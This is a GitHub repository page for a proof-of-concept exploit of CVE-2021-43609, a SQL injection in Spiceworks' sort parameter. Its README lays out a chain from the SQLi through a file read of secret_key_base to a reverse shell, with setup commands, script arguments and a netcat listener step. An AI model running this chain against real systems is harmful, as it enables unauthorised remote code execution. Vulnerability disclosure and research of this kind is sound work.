Skip to content
/ CVE-2021-43609-POC Public

Proof of Concept Exploit for CVE-2021-43609

4 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

d5sec/CVE-2021-43609-POC

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
rce
rce
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
poc.py
poc.py
 
 
writeup.md
writeup.md
 
 

Repository files navigation

Spiceworks Sort SQLi

There's a SQLi in a sort parameter of Spiceworks. The full exploit chain is SQLi -> file read -> RCE.

Demo

asciicast

Prerequisites

apt update && apt install -y ruby-dev nodejs python3 python3-pip libsqlite3-dev
pip3 install requests
gem install bundler && cd rce && bundle install

Stage 1

Use poc.py to exploit the SQLi -> file read and extract the secret_key_base environment variable. It will then generate a PoC ruby script to gain a reverse shell, with the values obtained from poc.py.

Usage

usage: poc.py [-h] --rhost RHOST --lhost LHOST --lport LPORT -u USER -p PASSWORD [-e ENV_PATH]

There's a SQLi in a `sort` parameter of Spiceworks. The exploit chain is SQLi -> file read -> RCE.

optional arguments:
  -h, --help            show this help message and exit
  --rhost RHOST         https://example.com
  --lhost LHOST         10.10.10.10
  --lport LPORT         9001
  -u USER, --user USER  [email protected]
  -p PASSWORD, --password PASSWORD
                        P@$$w0rd!
  -e ENV_PATH, --env_path ENV_PATH
                        Path to environment variables

Stage 2

Use rce.rb. Spin up a nc listener on the IP & port you provided in Stage 1, then simply:

cd rce && ruby rce.rb

Voila!

Credits

About

Proof of Concept Exploit for CVE-2021-43609

Resources

Readme
Activity

Stars

4 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages